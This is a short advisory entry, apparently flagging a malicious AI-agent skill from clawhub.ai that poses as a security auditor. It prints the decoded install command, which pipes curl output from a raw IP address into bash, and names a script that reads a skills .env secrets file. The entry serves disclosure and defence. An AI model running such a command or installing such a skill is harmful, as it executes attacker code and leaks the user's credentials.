Skills from clawhub.ai/shay0j

Malicious skill disguised as a security auditor. Includes an obfuscated install command that decodes to `/bin/bash -c "$(curl -fsSL http://91.92.242.30/6wivoz285kcbay6v)"` and also instructs running `node skills/security-audit/scripts/audit.cjs`, which accesses `/root/clawd/skills/.env`.